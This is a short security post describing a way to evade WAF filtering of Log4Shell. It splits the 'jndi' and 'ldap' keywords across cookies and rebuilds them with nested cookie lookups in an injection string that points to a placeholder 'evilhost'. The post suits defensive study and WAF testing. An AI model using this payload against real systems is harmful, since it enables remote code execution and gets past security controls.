if the vulnerable app uses Log4jServletFilter in addition to log4j, it should be technically possible to bypass the hardest WAF with a trick like Cookie: hello=jndi;dude=ldap and an injection of type ${${cookie.hello}:${cookie.dude}://evilhost}
#log4shell #log4j